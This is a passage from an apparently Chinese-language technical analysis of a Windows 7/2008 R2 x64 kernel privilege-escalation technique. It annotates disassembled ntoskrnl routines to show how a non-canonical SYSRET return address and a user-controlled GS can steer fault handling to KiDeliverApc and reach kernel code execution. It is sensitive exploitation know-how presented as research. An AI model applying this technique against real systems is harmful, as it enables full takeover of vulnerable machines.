[rdx+50h]</p><p>18.&nbsp;&nbsp;PAGE:FFFFF80002C5A16C mov rcx, [r9+58h]</p><p>19.&nbsp;&nbsp;PAGE:FFFFF80002C5A170 mov rax, [r11+108h]</p><p>20.&nbsp;&nbsp;PAGE:FFFFF80002C5A177 mov [rdx+168h], rax&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;// saved RIP</p><p>21.&nbsp;&nbsp;PAGE:FFFFF80002C5A17E mov rax, [r11+0A8h]</p><p>22.&nbsp;&nbsp;PAGE:FFFFF80002C5A185 mov [rdx+180h], rax</p><p>23.&nbsp;&nbsp;PAGE:FFFFF80002C5A18C mov rax, [r11+0B0h]</p><p>24.&nbsp;&nbsp;PAGE:FFFFF80002C5A193 mov [rdx+158h], rax</p><p>25.&nbsp;&nbsp;PAGE:FFFFF80002C5A19A mov eax, 33h ; '3'</p><p>26.&nbsp;&nbsp;PAGE:FFFFF80002C5A19F mov [rdx+170h], ax</p><p>27.&nbsp;&nbsp;PAGE:FFFFF80002C5A1A6 mov eax, 2Bh ; '+'</p><p>28.&nbsp;&nbsp;PAGE:FFFFF80002C5A1AB mov [rdx+188h], ax</p><p><strong>我們的想法是在ExecuteUmsThread()調用前破壞這個地址為非規范地址</strong>。而在用戶態的scheduler中,返回地址保存在: GS:[0x14a0] + 0x10 + 0x1F處。<br /><br />內核調度結束后,ntoskrnl.exe中的KiUmsFastReturnToUser()函數被調用。在調用SYSRET指令前, RSP, RBP和GS將會被重置為他們之前保存的副本,返回用戶態的地址也被移入RCX寄存器。</p><p>1.&nbsp; &nbsp; .text:FFFFF800028DD440 KiUmsFastReturnToUser</p><p>2.&nbsp; &nbsp; .text:FFFFF800028DD440</p><p>3.&nbsp; &nbsp; .text:FFFFF800028DD440 var_5046 = dword ptr -5046h</p><p>4.&nbsp; &nbsp; .text:FFFFF800028DD440 var_4FA6 = byte ptr -4FA6h</p><p>5.&nbsp; &nbsp; .text:FFFFF800028DD440 arg_42 = byte ptr 52h</p><p>6.&nbsp; &nbsp; .text:FFFFF800028DD440 arg_80 = byte ptr 88h</p><p>7.&nbsp; &nbsp; .text:FFFFF800028DD440 arg_190 = dword ptr 198h</p><p>8.&nbsp; &nbsp; .text:FFFFF800028DD440</p><p>9.&nbsp; &nbsp; .text:FFFFF800028DD440 sub rsp, 28h</p><p>10.&nbsp;&nbsp;.text:FFFFF800028DD444 mov rbx, gs:+188h</p><p>11.&nbsp;&nbsp;.text:FFFFF800028DD44D mov rcx, [rbx+1D8h]</p><p>12.&nbsp;&nbsp;.text:FFFFF800028DD454 lea rbp, [rcx+80h]</p><p>13.&nbsp;&nbsp;.text:FFFFF800028DD45B mov rax, cr8</p><p>14.&nbsp; &nbsp; [...]</p><p>15.&nbsp;&nbsp;.text:FFFFF800028DD596 loc_FFFFF800028DD596:</p><p>16.&nbsp;&nbsp;.text:FFFFF800028DD596 mov r8, [rbp+100h]&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;// saved RSP</p><p>17.&nbsp;&nbsp;.text:FFFFF800028DD59D mov r9, [rbp+0D8h]&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;// saved RBP</p><p>18.&nbsp;&nbsp;.text:FFFFF800028DD5A4 xor edx, edx</p><p>19.&nbsp;&nbsp;.text:FFFFF800028DD5A6 pxor xmm0, xmm0</p><p>20.&nbsp;&nbsp;.text:FFFFF800028DD5AA pxor xmm1, xmm1</p><p>21.&nbsp;&nbsp;.text:FFFFF800028DD5AE pxor xmm2, xmm2</p><p>22.&nbsp;&nbsp;.text:FFFFF800028DD5B2 pxor xmm3, xmm3</p><p>23.&nbsp;&nbsp;.text:FFFFF800028DD5B6 pxor xmm4, xmm4</p><p>24.&nbsp;&nbsp;.text:FFFFF800028DD5BA pxor xmm5, xmm5</p><p>25.&nbsp;&nbsp;.text:FFFFF800028DD5BE mov rcx, [rbp+0E8h]&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;// saved ret address</p><p>26.&nbsp;&nbsp;.text:FFFFF800028DD5C5 mov r11, [rbp+0F8h]</p><p>27.&nbsp;&nbsp;.text:FFFFF800028DD5CC mov rbp, r9</p><p>28.&nbsp;&nbsp;.text:FFFFF800028DD5CF mov rsp, r8</p><p>29.&nbsp;&nbsp;.text:FFFFF800028DD5D2 swapgs&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;// switch GS to user</p><p>30.&nbsp;&nbsp;.text:FFFFF800028DD5D5 sysret</p><p>31.&nbsp;&nbsp;.text:FFFFF800028DD5D8 db 66h, 66h, 66h, 66h, 66h, 66h</p><p>32.&nbsp;&nbsp;.text:FFFFF800028DD5D8 nop word ptr [rax+rax+00000000h]</p><p>33.&nbsp;&nbsp;.text:FFFFF800028DD5E7 db 66h, 66h, 66h, 66h, 66h, 66h</p><p>但是,如果此時RCX是不規范的,那么GP異常將在特權模式下被拋出。<br /><br /><strong>3. Windows 7 &amp; Windows 2008 R2 x64下的利用<br /></strong><br />GP異常拋出時,RSP和RBP可控,GS指向用戶態,PFH(protection fault handler)則被指向KiGeneralProtectionFault()函數<br /><br />一種利用此漏洞的方式,是利用已控的RBP和RBP。因為KiGeneralProtectionFault()將會把值寫入堆棧,且堆棧也是可控的?;谶@些我們可以試試write-4 techniques。<br /><br />ps: write-4 techniques - http://immunityinc.com/infiltrate/archives/kernelpool_infiltrate2011.pdf</p><p>1.&nbsp; &nbsp; .text:FFFFF800028DBAC0 KiGeneralProtectionFault</p><p>2.&nbsp; &nbsp; .text:FFFFF800028DBAC0</p><p>3.&nbsp; &nbsp; .text:FFFFF800028DBAC0 var_12D = byte ptr -12Dh</p><p>4.&nbsp; &nbsp; .text:FFFFF800028DBAC0 var_12C = dword ptr -12Ch</p><p>5.&nbsp; &nbsp; .text:FFFFF800028DBAC0 var_128 = qword ptr -128h</p><p>6.&nbsp; &nbsp; .text:FFFFF800028DBAC0 var_120 = qword ptr -120h</p><p>7.&nbsp; &nbsp; .text:FFFFF800028DBAC0 var_118 = qword ptr -118h</p><p>8.&nbsp; &nbsp; .text:FFFFF800028DBAC0 var_110 = qword ptr -110h</p><p>9.&nbsp; &nbsp; .text:FFFFF800028DBAC0 var_108 = qword ptr -108h</p><p>10.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_100 = qword ptr -100h</p><p>11.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_F8 = qword ptr -0F8h</p><p>12.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_E8 = xmmword ptr -0E8h</p><p>13.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_D8 = xmmword ptr -0D8h</p><p>14.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_C8 = xmmword ptr -0C8h</p><p>15.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_B8 = xmmword ptr -0B8h</p><p>16.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_A8 = xmmword ptr -0A8h</p><p>17.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_98 = xmmword ptr -98h</p><p>18.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_58 = word ptr -58h</p><p>19.&nbsp;&nbsp;.text:FFFFF800028DBAC0 arg_0 = qword ptr 10h</p><p>20.&nbsp;&nbsp;.text:FFFFF800028DBAC0 arg_8 = byte ptr 18h</p><p>21.&nbsp;&nbsp;.text:FFFFF800028DBAC0 arg_10 = qword ptr 20h</p><p>22.&nbsp;&nbsp;.text:FFFFF800028DBAC0 arg_24 = dword ptr 34h</p><p>23.&nbsp;&nbsp;.text:FFFFF800028DBAC0</p><p>24.&nbsp;&nbsp;.text:FFFFF800028DB600 push rbp</p><p>25.&nbsp;&nbsp;.text:FFFFF800028DB601 sub rsp, 158h</p><p>26.&nbsp;&nbsp;.text:FFFFF800028DB608 lea rbp, [rsp+80h]</p><p>27.&nbsp;&nbsp;.text:FFFFF800028DB610 mov [rbp+0D8h+var_12D], 1</p><p>28.&nbsp;&nbsp;.text:FFFFF800028DB614 mov [rbp+0D8h+var_128], rax</p><p>29.&nbsp;&nbsp;.text:FFFFF800028DB618 mov [rbp+0D8h+var_120], rcx</p><p>30.&nbsp;&nbsp;.text:FFFFF800028DB61C mov [rbp+0D8h+var_118], rdx</p><p>31.&nbsp;&nbsp;.text:FFFFF800028DB620 mov [rbp+0D8h+var_110], r8</p><p>32.&nbsp;&nbsp;.text:FFFFF800028DB624 mov [rbp+0D8h+var_108], r9</p><p>33.&nbsp;&nbsp;.text:FFFFF800028DB628 mov [rbp+0D8h+var_100], r10</p><p>34.&nbsp;&nbsp;.text:FFFFF800028DB62C mov [rbp+0D8h+var_F8], r11</p><p>35.&nbsp;&nbsp;.text:FFFFF800028DB630 test [rbp+0D8h+arg_8], 1</p><p>36.&nbsp;&nbsp;.text:FFFFF800028DB637 jz short loc_FFFFF800028DB65A</p><p>37.&nbsp;&nbsp;.text:FFFFF800028DB639 swapgs</p><p>38.&nbsp;&nbsp;.text:FFFFF800028DB63C mov r10, gs:188h</p><p>39.&nbsp;&nbsp;.text:FFFFF800028DB645 test byte ptr [r10+3], 3</p><p>40.&nbsp;&nbsp;.text:FFFFF800028DB64A mov [rbp+0D8h+var_58], 0</p><p>然而,因為目標內存周圍數據已被破壞,這使得此exp方法不可靠。<br /><br /><strong>一個更好的方法是利用指向用戶空間的GS。</strong>我們的思路是,欺騙內核調用GS中索引的函數。這種功能可以觸發頁錯誤處理程序(所有這一切需要做的是產生此異常)。</p><p>1.&nbsp; &nbsp; .text:FFFFF800028DB65A cld</p><p>2.&nbsp; &nbsp; .text:FFFFF800028DB65B stmxcsr [rbp+0D8h+var_12C]</p><p>3.&nbsp; &nbsp; .text:FFFFF800028DB65F ldmxcsr dword ptr gs:180h</p><p>4.&nbsp; &nbsp; .text:FFFFF800028DB668 movaps [rbp+0D8h+var_E8], xmm0</p><p>5.&nbsp; &nbsp; .text:FFFFF800028DB66C movaps [rbp+0D8h+var_D8], xmm1</p><p>6.&nbsp; &nbsp; .text:FFFFF800028DB670 movaps [rbp+0D8h+var_C8], xmm2</p><p>7.&nbsp; &nbsp; .text:FFFFF800028DB674 movaps [rbp+0D8h+var_B8], xmm3</p><p>8.&nbsp; &nbsp; .text:FFFFF800028DB678 movaps [rbp+0D8h+var_A8], xmm4</p><p>9.&nbsp; &nbsp; .text:FFFFF800028DB67C movaps [rbp+0D8h+var_98], xmm5</p><p>10.&nbsp;&nbsp;.text:FFFFF800028DB680 mov eax, [rbp+0E0h]</p><p>11.&nbsp;&nbsp;.text:FFFFF800028DB686 test [rbp+0D8h+arg_10], 200h</p><p>12.&nbsp;&nbsp;.text:FFFFF800028DB691 jz short loc_FFFFF800028DB694</p><p>13.&nbsp;&nbsp;.text:FFFFF800028DB693 sti</p><p>14.&nbsp;&nbsp;.text:FFFFF800028DB694 loc_FFFFF800028DB694:</p><p>15.&nbsp;&nbsp;.text:FFFFF800028DB694 mov r10, [rbp+0D8h+arg_0]</p><p>16.&nbsp;&nbsp;.text:FFFFF800028DB69B mov r9, cr4</p><p>17.&nbsp;&nbsp;.text:FFFFF800028DB69F mov r8, cr0</p><p>18.&nbsp;&nbsp;.text:FFFFF800028DB6A3 mov edx, 8</p><p>19.&nbsp;&nbsp;.text:FFFFF800028DB6A8 mov ecx, 7Fh</p><p>20.&nbsp;&nbsp;.text:FFFFF800028DB6AD call KiBugCheckDisPatch</p><p><strong>此函數叫做 KeBugCheckEx()</strong></p><p>1.&nbsp; &nbsp; .text:FFFFF800028DD180 KiBugCheckDispatch</p><p>2.&nbsp; &nbsp; .text:FFFFF800028DD180</p><p>3.&nbsp; &nbsp; .text:FFFFF800028DD180 var_118= qword ptr -118h</p><p>4.&nbsp; &nbsp; .text:FFFFF800028DD180 var_108= xmmword ptr -108h</p><p>5.&nbsp; &nbsp; .text:FFFFF800028DD180 var_F8= xmmword ptr -0F8h</p><p>6.&nbsp; &nbsp; .text:FFFFF800028DD180 var_E8= xmmword ptr -0E8h</p><p>7.&nbsp; &nbsp; .text:FFFFF800028DD180 var_D8= xmmword ptr -0D8h</p><p>8.&nbsp; &nbsp; .text:FFFFF800028DD180 var_C8= xmmword ptr -0C8h</p><p>9.&nbsp; &nbsp; .text:FFFFF800028DD180 var_38= byte ptr -38h</p><p>10.&nbsp;&nbsp;.text:FFFFF800028DD180</p><p>11.&nbsp;&nbsp;.text:FFFFF800028DD180 sub rsp, 138h</p><p>12.&nbsp;&nbsp;.text:FFFFF800028DD187 lea rax, [rsp+138h+var_38]</p><p>13.&nbsp;&nbsp;.text:FFFFF800028DD18F movaps [rsp+138h+var_108], xmm6</p><p>14.&nbsp;&nbsp;.text:FFFFF800028DD194 movaps [rsp+138h+var_F8], xmm7</p><p>15.&nbsp;&nbsp;.text:FFFFF800028DD199 movaps [rsp+138h+var_E8], xmm8</p><p>16.&nbsp; &nbsp; [...]</p><p>17.&nbsp;&nbsp;.text:FFFFF800028DD1D3 mov [rax+20h], r13</p><p>18.&nbsp;&nbsp;.text:FFFFF800028DD1D7 mov [rax+28h], r14</p><p>19.&nbsp;&nbsp;.text:FFFFF800028DD1DB mov [rax+30h], r15</p><p>20.&nbsp;&nbsp;.text:FFFFF800028DD1DF mov [rsp+138h+var_118], r10</p><p>21.&nbsp;&nbsp;.text:FFFFF800028DD1E4 call KeBugCheckEx</p><p>22.&nbsp;&nbsp;.text:FFFFF800028DD1E4 KiBugCheckDispatch endp</p><p>KeBugCheckEx()函數需要將控制狀態寄存器保存到GS索引的一個內存結構。</p><p>1.&nbsp; &nbsp; .text:FFFFF800028DDC40 KeBugCheckEx</p><p>2.&nbsp; &nbsp; .text:FFFFF800028DDC40</p><p>3.&nbsp; &nbsp; .text:FFFFF800028DDC40 var_18= qword ptr -18h</p><p>4.&nbsp; &nbsp; .text:FFFFF800028DDC40 var_10= qword ptr -10h</p><p>5.&nbsp; &nbsp; .text:FFFFF800028DDC40 var_8= qword ptr -8</p><p>6.&nbsp; &nbsp; .text:FFFFF800028DDC40 arg_0= qword ptr 8</p><p>7.&nbsp; &nbsp; .text:FFFFF800028DDC40 arg_8= qword ptr 10h</p><p>8.&nbsp; &nbsp; .text:FFFFF800028DDC40 arg_10= qword ptr 18h</p><p>9.&nbsp; &nbsp; .text:FFFFF800028DDC40 arg_18= qword ptr 20h</p><p>10.&nbsp;&nbsp;.text:FFFFF800028DDC40 arg_20= qword ptr 28h</p><p>11.&nbsp;&nbsp;.text:FFFFF800028DDC40 arg_28= byte ptr 30h</p><p>12.&nbsp;&nbsp;.text:FFFFF800028DDC40</p><p>13.&nbsp;&nbsp;.text:FFFFF800028DDC40 mov [rsp+arg_0], rcx</p><p>14.&nbsp;&nbsp;.text:FFFFF800028DDC45 mov [rsp+arg_8], rdx</p><p>15.&nbsp;&nbsp;.text:FFFFF800028DDC4A mov [rsp+arg_10], r8</p><p>16.&nbsp;&nbsp;.text:FFFFF800028DDC4F mov [rsp+arg_18], r9</p><p>17.&nbsp;&nbsp;.text:FFFFF800028DDC54 pushfq</p><p>18.&nbsp;&nbsp;.text:FFFFF800028DDC55 sub rsp, 30h</p><p>19.&nbsp;&nbsp;.text:FFFFF800028DDC59 cli</p><p>20.&nbsp;&nbsp;.text:FFFFF800028DDC5A mov rcx, gs:20h</p><p>21.&nbsp;&nbsp;.text:FFFFF800028DDC63 mov rcx, [rcx+4BD8h]</p><p>22.&nbsp;&nbsp;.text:FFFFF800028DDC6A call RtlCaptureContext</p><p>23.&nbsp;&nbsp;.text:FFFFF800028DDC6F mov rcx, gs:20h</p><p>24.&nbsp;&nbsp;.text:FFFFF800028DDC78 add rcx, 40h</p><p>25.&nbsp;&nbsp;.text:FFFFF800028DDC7C call KiSaveProcessorControlState</p><p>26.&nbsp;&nbsp;.text:FFFFF800028DDC81 mov r10, gs:20h</p><p>27.&nbsp;&nbsp;.text:FFFFF800028DDC8A mov r10, [r10+4BD8h]</p><p>28.&nbsp;&nbsp;.text:FFFFF800028DDC91 mov rax, [rsp+38h+arg_0]</p><p>29.&nbsp;&nbsp;.text:FFFFF800028DDC96 mov [r10+80h], rax</p><p>30.&nbsp;&nbsp;.text:FFFFF800028DDC9D mov rax, [rsp+38h+var_8]</p><p>KeSaveProcessorControlState()函數將嘗試把cr0寄存器的內容保存在GS:0x20處。</p><p>1.&nbsp; &nbsp; .text:FFFFF800028DDF70 KiSaveProcessorControlState</p><p>2.&nbsp; &nbsp; .text:FFFFF800028DDF70 mov rax, cr0</p><p>3.&nbsp; &nbsp; .text:FFFFF800028DDF73 mov [rcx], rax</p><p>4.&nbsp; &nbsp; .text:FFFFF800028DDF76 mov rax, cr2</p><p>5.&nbsp; &nbsp; .text:FFFFF800028DDF79 mov [rcx+8], rax</p><p>6.&nbsp; &nbsp; .text:FFFFF800028DDF7D mov rax, cr3</p><p>7.&nbsp; &nbsp; .text:FFFFF800028DDF80 mov [rcx+10h], rax</p><p>8.&nbsp; &nbsp; .text:FFFFF800028DDF84 mov rax, cr4</p><p><strong>這可以被用來拋出一個頁錯誤:<br /></strong><br />如果一個諸如0x54545454`54545454的值被存儲在GS:0x20,那么頁錯誤將被觸發。<br /><br />在頁錯誤處理程序中,我們的目標在于達到KiCheckForKernelApcDelivery()函數。它主要包括設置一個有效的指針GS:0x188(初始設置為0)。</p><p>1.&nbsp; &nbsp; .text:FFFFF800028DBC00 KiPageFault</p><p>2.&nbsp; &nbsp; .text:FFFFF800028DBC00</p><p>3.&nbsp; &nbsp; .text:FFFFF800028DBC00 var_158= dword ptr -158h</p><p>4.&nbsp; &nbsp; .text:FFFFF800028DBC00 var_138= dword ptr -138h</p><p>5.&nbsp; &nbsp; .text:FFFFF800028DBC00 var_12E= byte ptr -12Eh</p><p>6.&nbsp; &nbsp; .text:FFFFF800028DBC00 var_12D= byte ptr -12Dh</p><p>7.&nbsp; &nbsp; .text:FFFFF800028DBC00 var_12C= dword ptr -12Ch</p><p>8.&nbsp; &nbsp; .text:FFFFF800028DBC00 var_128= qword ptr -128h</p><p>9.&nbsp; &nbsp;&nbsp; &nbsp;[...]</p><p>10.&nbsp;&nbsp;.text:FFFFF800028DBC00 push rbp</p><p>11.&nbsp;&nbsp;.text:FFFFF800028DBC01 sub rsp, 158h</p><p>12.&nbsp;&nbsp;.text:FFFFF800028DBC08 lea rbp, [rsp+80h]</p><p>13.&nbsp;&nbsp;.text:FFFFF800028DBC10 mov [rbp+0D8h+var_12D], 1</p><p>14.&nbsp;&nbsp;.text:FFFFF800028DBC14 mov [rbp+0D8h+var_128], rax</p><p>15.&nbsp;&nbsp;.text:FFFFF800028DBC18 mov [rbp+0D8h+var_120], rcx</p><p>16.&nbsp;&nbsp;.text:FFFFF800028DBC1C mov [rbp+0D8h+var_118], rdx</p><p>17.&nbsp;&nbsp;.text:FFFFF800028DBC20 mov [rbp+0D8h+var_110], r8</p><p>18.&nbsp;&nbsp;.text:FFFFF800028DBC24 mov [rbp+0D8h+var_108], r9</p><p>19.&nbsp;&nbsp;.text:FFFFF800028DBC28 mov [rbp+0D8h+var_100], r10</p><p>20.&nbsp;&nbsp;.text:FFFFF800028DBC2C mov [rbp+0D8h+var_F8], r11</p><p>21.&nbsp;&nbsp;.text:FFFFF800028DBC30 test byte ptr [rbp+0D8h+arg_8], 1</p><p>22.&nbsp;&nbsp;.text:FFFFF800028DBC37 jz short loc_FFFFF800028DBCAD</p><p>23.&nbsp;&nbsp;.text:FFFFF800028DBC39 swapgs</p><p>24.&nbsp;&nbsp;.text:FFFFF800028DBC3C mov r10, gs:188h</p><p>25.&nbsp;&nbsp;.text:FFFFF800028DBC45 cmp [rbp+0D8h+arg_8], 33h ; '3'</p><p>26.&nbsp; &nbsp; [...]</p><p>27.&nbsp;&nbsp;.text:FFFFF800028DBCAD loc_FFFFF800028DBCAD:</p><p>28.&nbsp;&nbsp;; KiPageFault+A6 j</p><p>29.&nbsp;&nbsp;.text:FFFFF800028DBCAD cld</p><p>30.&nbsp;&nbsp;.text:FFFFF800028DBCAE stmxcsr [rbp+0D8h+var_12C]</p><p>31.&nbsp;&nbsp;.text:FFFFF800028DBCB2 ldmxcsr dword ptr gs:180h</p><p>32.&nbsp;&nbsp;.text:FFFFF800028DBCBB movaps [rbp+0D8h+var_E8], xmm0</p><p>33.&nbsp;&nbsp;.text:FFFFF800028DBCBF movaps [rbp+0D8h+var_D8], xmm1</p><p>34.&nbsp;&nbsp;.text:FFFFF800028DBCC3 movaps [rbp+0D8h+var_C8], xmm2</p><p>35.&nbsp;&nbsp;.text:FFFFF800028DBCC7 movaps [rbp+0D8h+var_B8], xmm3</p><p>36.&nbsp;&nbsp;.text:FFFFF800028DBCCB movaps [rbp+0D8h+var_A8], xmm4</p><p>37.&nbsp;&nbsp;.text:FFFFF800028DBCCF movaps [rbp+0D8h+var_98], xmm5</p><p>38.&nbsp;&nbsp;.text:FFFFF800028DBCD3 mov eax, cs:KiCodePatchCycle</p><p>39.&nbsp;&nbsp;.text:FFFFF800028DBCD9 mov [rbp+0D8h+arg_24], eax</p><p>40.&nbsp;&nbsp;.text:FFFFF800028DBCDF mov eax, [rbp+0E0h]</p><p>41.&nbsp;&nbsp;.text:FFFFF800028DBCE5 mov rcx, cr2</p><p>42.&nbsp;&nbsp;.text:FFFFF800028DBCE8 test [rbp+0D8h+arg_10], 200h</p><p>43.&nbsp;&nbsp;.text:FFFFF800028DBCF3 jz short loc_FFFFF800028DBCF6</p><p>44.&nbsp;&nbsp;.text:FFFFF800028DBCF5 sti</p><p>45.&nbsp; &nbsp; [...]</p><p>46.&nbsp;&nbsp;.text:FFFFF800028DBCF6 loc_FFFFF800028DBCF6:</p><p>47.&nbsp;&nbsp;.text:FFFFF800028DBCF6 mov r9, gs:188h</p><p>48.&nbsp;&nbsp;.text:FFFFF800028DBCFF bt dword ptr [r9+4Ch], 0Bh</p><p>49.&nbsp;&nbsp;.text:FFFFF800028DBD05 jnb short loc_FFFFF800028DBD15</p><p>50.&nbsp;&nbsp;.text:FFFFF800028DBD07 test byte ptr [rbp+0F0h], 1</p><p>51.&nbsp; &nbsp; [...]</p><p>52.&nbsp;&nbsp;.text:FFFFF800028EACF2 loc_FFFFF800028EACF2:</p><p>53.&nbsp;&nbsp;.text:FFFFF800028EACF2 mov r12, gs:188h</p><p>54.&nbsp;&nbsp;.text:FFFFF800028EACFB mov [rbp+0D0h+var_78], rdi</p><p>55.&nbsp;&nbsp;.text:FFFFF800028EACFF mov rcx, [r12+70h]</p><p>56.&nbsp;&nbsp;.text:FFFFF800028EAD04 mov [rbp+0D0h+var_98], rcx</p><p>57.&nbsp;&nbsp;.text:FFFFF800028EAD08 cmp dword ptr [rcx+438h], 10h</p><p>58.&nbsp;&nbsp;.text:FFFFF800028EAD0F lea r14, [rcx+398h]</p><p>59.&nbsp;&nbsp;.text:FFFFF800028EAD16 ja loc_FFFFF800028EB0E2</p><p>60.&nbsp;&nbsp;.text:FFFFF800028EAD1C mov eax, cs:MiDelayPageFaults</p><p>61.&nbsp;&nbsp;.text:FFFFF800028EAD22 test eax, eax</p><p>62.&nbsp; &nbsp; [...]</p><p>63.&nbsp;&nbsp;.text:FFFFF800028EC79C loc_FFFFF800028EC79C:</p><p>64.&nbsp;&nbsp;.text:FFFFF800028EC79C call KiCheckForKernelApcDelivery</p><p>65.&nbsp;&nbsp;.text:FFFFF800028EC7A1 jmp loc_FFFFF800028EAF75</p><p><strong>KiCheckForKernelApcDelivery()函數調用的KiDeliverApc():</strong></p><p>1.&nbsp; &nbsp; .text:FFFFF8000288AF10 KiCheckForKernelApcDelivery</p><p>2.&nbsp; &nbsp; .text:FFFFF8000288AF10 push rbx</p><p>3.&nbsp; &nbsp; .text:FFFFF8000288AF12 sub rsp, 20h</p><p>4.&nbsp; &nbsp; .text:FFFFF8000288AF16 mov rax, cr8</p><p>5.&nbsp; &nbsp; .text:FFFFF8000288AF1A mov ecx, 1</p><p>6.&nbsp; &nbsp; .text:FFFFF8000288AF1F test al, al</p><p>7.&nbsp; &nbsp; .text:FFFFF8000288AF21 jnz short loc_FFFFF8000288AF3F</p><p>8.&nbsp; &nbsp; .text:FFFFF8000288AF23 xor ebx, ebx</p><p>9.&nbsp; &nbsp; .text:FFFFF8000288AF25 mov cr8, rcx</p><p>10.&nbsp;&nbsp;.text:FFFFF8000288AF29 xor r8d, r8d</p><p>11.&nbsp;&nbsp;.text:FFFFF8000288AF2C xor edx, edx</p><p>12.&nbsp;&nbsp;.text:FFFFF8000288AF2E xor ecx, ecx</p><p>13.&nbsp;&nbsp;.text:FFFFF8000288AF30 call KiDeliverApc</p><p>14.&nbsp;&nbsp;.text:FFFFF8000288AF35 mov cr8, rbx</p><p><strong>這是一個實現代碼執行的函數</strong>。它將提取GS:0x188中的指針,并在一系列解引用操作后設置R11寄存器,而R11寄存器用來調用另一個函數。</p><p>1.&nbsp; &nbsp; .text:FFFFF800028D1130 KiDeliverApc</p><p>2.&nbsp; &nbsp; .text:FFFFF800028D1130</p><p>3.&nbsp; &nbsp; .text:FFFFF800028D1130 var_78= dword ptr -78h</p><p>4.&nbsp; &nbsp; .text:FFFFF800028D1130 var_58= qword ptr -58h</p><p>5.&nbsp; &nbsp; .text:FFFFF800028D1130 var_50= qword ptr -50h</p><p>6.&nbsp; &nbsp; .text:FFFFF800028D1130 var_48= qword ptr -48h</p><p>7.&nbsp; &nbsp; .text:FFFFF800028D1130 var_40= qword ptr -40h</p><p>8.&nbsp; &nbsp; .text:FFFFF800028D1130 arg_0= qword ptr 8</p><p>9.&nbsp; &nbsp;&nbsp; &nbsp;[...]</p><p>10.&nbsp;&nbsp;.text:FFFFF800028D115B loc_FFFFF800028D115B:</p><p>11.&nbsp;&nbsp;.text:FFFFF800028D115B mov rbx, gs:188h</p><p>12.&nbsp;&nbsp;.text:FFFFF800028D1164 mov r15, [rbx+1D8h]</p><p>13.&nbsp;&nbsp;.text:FFFFF800028D116B mov r14, [rbx+70h]</p><p>14.&nbsp;&nbsp;.text:FFFFF800028D116F mov [rbx+79h], r9b</p><p>15.&nbsp;&nbsp;.text:FFFFF800028D1173 mov [rbx+1D8h], r8</p><p>16.&nbsp;&nbsp;.text:FFFFF800028D117A cmp [rbx+1C6h], r9w</p><p>17.&nbsp;&nbsp;.text:FFFFF800028D1182 jnz short loc_FFFFF800028D11A8</p><p>18.&nbsp;&nbsp;.text:FFFFF800028D1184 lock or [rsp+78h+var_78], r9d</p><p>19.&nbsp;&nbsp;.text:FFFFF800028D1189 lfence</p><p>20.&nbsp;&nbsp;.text:FFFFF800028D118C lea rsi, [rbx+50h]</p><p>21.&nbsp; &nbsp; [...]</p><p>22.&nbsp;&nbsp;.text:FFFFF800028D11EC loc_FFFFF800028D11EC:</p><p>23.&nbsp;&nbsp;.text:FFFFF800028D11EC mov r8, [rsi]</p><p>24.&nbsp;&nbsp;.text:FFFFF800028D11EF cmp r8, rsi</p><p>25.&nbsp;&nbsp;.text:FFFFF800028D11F2 jz loc_FFFFF800029296C7</p><p>26.&nbsp;&nbsp;.text:FFFFF800028D11F8 mov [rbx+79h], r9b</p><p>27.&nbsp;&nbsp;.text:FFFFF800028D11FC lea r10, [r8-10h]</p><p>28.&nbsp;&nbsp;.text:FFFFF800028D1200 prefetchw byte ptr [r10]</p><p>29.&nbsp;&nbsp;.text:FFFFF800028D1204 mov rcx, [r10+30h]</p><p>30.&nbsp;&nbsp;.text:FFFFF800028D1208 mov r11, [r10+20h]</p><p>31.&nbsp;&nbsp;.text:FFFFF800028D120C mov [rsp+78h+arg_10], rcx</p><p>32.&nbsp;&nbsp;.text:FFFFF800028D1214 mov rax, [r10+38h]</p><p>33.&nbsp; &nbsp; [...]</p><p>34.&nbsp;&nbsp;.text:FFFFF800028D12B0 loc_FFFFF800028D12B0:</p><p>35.&nbsp;&nbsp;.text:FFFFF800028D12B0 mov rax, [r8+8]</p><p>36.&nbsp;&nbsp;.text:FFFFF800028D12B4 mov rdx, [r8]</p><p>37.&nbsp;&nbsp;.text:FFFFF800028D12B7 mov [rax], rdx</p><p>38.&nbsp;&nbsp;.text:FFFFF800028D12BA mov [rdx+8], rax</p><p>39.&nbsp;&nbsp;.text:FFFFF800028D12BE mov [r10+52h], r9b</p><p>40.&nbsp;&nbsp;.text:FFFFF800028D12C2 lock and [rbx+88h], r9</p><p>41.&nbsp;&nbsp;.text:FFFFF800028D12CA movzx eax, r12b</p><p>42.&nbsp;&nbsp;.text:FFFFF800028D12CE mov cr8, rax</p><p>43.&nbsp;&nbsp;.text:FFFFF800028D12D2 lea rax, [rsp+78h+arg_18]</p><p>44.&nbsp;&nbsp;.text:FFFFF800028D12DA lea r9, [rsp+78h+var_48]</p><p>45.&nbsp;&nbsp;.text:FFFFF800028D12DF lea r8, [rsp+78h+var_40]</p><p>46.&nbsp;&nbsp;.text:FFFFF800028D12E4 lea rdx, [rsp+78h+arg_10]</p><p>47.&nbsp;&nbsp;.text:FFFFF800028D12EC mov rcx, r10</p><p>48.&nbsp;&nbsp;.text:FFFFF800028D12EF mov [rsp+78h+var_58], rax</p><p>49.&nbsp;&nbsp;.text:FFFFF800028D12F4 call r11</p><p>50.&nbsp;&nbsp;.text:FFFFF800028D12F7 xor r9d, 